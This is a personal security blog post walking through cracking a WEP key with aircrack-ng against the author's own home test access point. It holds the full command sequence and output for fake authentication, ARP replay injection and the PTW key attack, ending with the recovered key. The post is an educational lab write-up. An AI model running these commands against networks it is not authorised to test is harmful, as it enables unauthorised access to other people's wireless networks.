WEP Cracking with Aircrack-ng in Kali

While I wasn't able to find any in my neighborhood, I setup a demo AP for some WEP cracking at home.

For those of you that didn't know, I recently picked up a new alfa card, so it was time to give it a test drive.

Setup

First, I setup a 2nd SSID on my AP that would support WEP, and generated a random 128-bit key.

Once I configured the AP, I ran airodump to find the new network. Note that the encrypt flag will filter out my results, and only show me WEP networks.

root@kali:~/wep# airodump-ng wlan0mon --encrypt WEP

WEP Cracking - AP

Monitoring

After I found the new SSID, I restarted my monitoring interface on channel 1.

root@kali:~/wep#  airmon-ng stop wlan0mon

PHY    Interface    Driver        Chipset

phy0    wlan0mon    ath9k_htc    Atheros Communications, Inc. AR9271 802.11n

        (mac80211 station mode vif enabled on [phy0]wlan0)

        (mac80211 monitor mode vif disabled for [phy0]wlan0mon)

root@kali:~/wep#  airmon-ng start wlan0 1

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  431 NetworkManager
  869 wpa_supplicant
 1747 dhclient

PHY    Interface    Driver        Chipset

phy0    wlan0mon    ath9k_htc    Atheros Communications, Inc. AR9271 802.11n

Once the monitoring interface was back up, it was time to test packet injection.

root@kali:~/wep#  aireplay-ng -9 -e WEPisBAD -a 06:xx:xx:xx:xx:xx wlan0mon
11:34:22  Waiting for beacon frame (BSSID: 06:xx:xx:xx:xx:xx) on channel 1
11:34:22  Trying broadcast probe requests...
11:34:22  Injection is working!
11:34:24  Found 1 AP

11:34:24  Trying directed probe requests...
11:34:24  06:xx:xx:xx:xx:xx - channel: 1 - 'WEPisBAD'
11:34:25  Ping (min/avg/max): 2.423ms/15.027ms/29.647ms Power: -44.93
11:34:25  30/30: 100%

With packet injecting possible (at a 100% rate), I started airodump again to begin capturing IVs.

root@kali:~/wep#  airodump-ng -c 1 --bssid 06:xx:xx:xx:xx:xx -w output wlan0mon

WEP Cracking - Airodump

Authentication

The next step was to perform a fake authentication with the AP. The reason for this is that the AP will not accept packets from a MAC address that it does not already recognize. Since I do not know the WEP key yet, aireplay can fake an authentication for me.

root@kali:~/wep#  aireplay-ng -1 0 -e WEPisBAD -a 06:xx:xx:xx:xx:xx -h 00:xx:xx:xx:xx:xx wlan0mon
11:33:51  Waiting for beacon frame (BSSID: 06:xx:xx:xx:xx:xx) on channel 1

11:33:51  Sending Authentication Request (Open System) [ACK]
11:33:51  Authentication successful
11:33:51  Sending Association Request [ACK]
11:33:51  Association successful 🙂 (AID: 1)

Attack

Once the fake authentication was complete, I was able to start generating traffic. In this case, I used aireplay in ARP replay mode. This will allow aireplay to listen for ARP request packets, and then inject them back into the network. This will allow us to obtain a lot of IVs in a short period.

root@kali:~/wep#  aireplay-ng --arpreplay -b 06:xx:xx:xx:xx:xx -h 00:xx:xx:xx:xx:xx wlan0mon
11:35:44  Waiting for beacon frame (BSSID: 06:xx:xx:xx:xx:xx) on channel 1
Saving ARP requests in replay_arp-0318-113544.cap
You should also start airodump-ng to capture replies.
Read 4036 packets (got 1 ARP requests and 128 ACKs), sent 129 packets...(498 pps)
Read 4147 packets (got 1 ARP requests and 178 ACKs), sent 179 packets...(499 pps)
Read 4255 packets (got 1 ARP requests and 228 ACKs), sent 230 packets...(501 pps)
Read 4362 packets (got 1 ARP requests and 278 ACKs), sent 280 packets...(501 pps)
Read 4471 packets (got 1 ARP requests and 329 ACKs), sent 329 packets...(499 pps)
Read 4574 packets (got 1 ARP requests and 378 ACKs), sent 379 packets...(499 pps)
Read 4679 packets (got 1 ARP requests and 427 ACKs), sent 429 packets...(499 pps)
Read 4790 packets (got 1 ARP requests and 479 ACKs), sent 480 packets...(500 pps)
Read 4895 packets (got 1 ARP requests and 528 ACKs), sent 530 packets...(500 pps)
Read 5003 packets (got 1 ARP requests and 578 ACKs), sent 579 packets...(499 pps)
Read 5111 packets (got 1 ARP requests and 629 ACKs), sent 629 packets...(499 pps)
Read 5217 packets (got 1 ARP requests and 678 ACKs), sent 680 packets...(500 pps)

WEP Cracking - ARP Replay

After awhile (around 5000 data packets), I tried to crack the key. As you can see, this did not work (mostly because I set a random 128-bit key to start). That said, aircrack will retry the attack every 5000 IVs until it is able to crack the key.

root@kali:~/wep#  aircrack-ng output-0*.cap
Opening output-01.cap
Read 138001 packets.

   #  BSSID              ESSID                     Encryption

   1  06:xx:xx:xx:xx:xx  WEPisBAD                  WEP (6710 IVs)

Choosing first network as target.

Opening output-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 6735 ivs.


                                 Aircrack-ng 1.2 rc4


                 [00:00:04] Tested 168121 keys (got 7125 IVs)

   KB    depth   byte(vote)
    0   17/ 18   E4(9728) 13(9472) 29(9472) 2E(9472) 86(9472)  40)
    1   15/ 19   F6(9728) 18(9472) 29(9472) 2F(9472) 50(9472) )
    2    4/  5   D7(10752) 33(10240) 53(10240) AB(10240) D4(10240)
    3   10/  3   9D(9984) 73(9728) 76(9728) 78(9728) 7E(9728) 84)
    4   21/  4   C1(9728) 08(9472) 2C(9472) 4D(9472) 8E(9472) 4)

Failed. Next try with 10000 IVs.

Once I had just over 34,000 IVs, aircrack was able to get the WEP key!

WEP Cracking - Key Obtained

58:46:7E:7D:5F:7D:2C:6C:3A:46:5D:5A:6E

Connecting

To verify the key was correct, I attempted to authenticate using the networking UI.

WEP Cracking - Connecting

After a few seconds, I connected, and iwconfig showed my access!

WEP Cracking - Connected

Conclusion

While WEP cracking is a little less relevant nowadays, it was still a fun exercise to try out my new toy. For more information about this attack, and many more, I recommend the aircrack wiki.

doyler on Githubdoyler on Twitter
doyler
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Principal Penetration Testing Consultant for Secureworks. His previous position was a Senior Penetration Tester for a major financial institution.

When he's not figuring out what cert to get next or side project to work on, he enjoys playing video games, traveling, and watching sports.

Leave a Comment

Filed under Security Not Included

Leave a Reply

Your email address will not be published. Required fields are marked *

*

This site uses Akismet to reduce spam. Learn how your comment data is processed.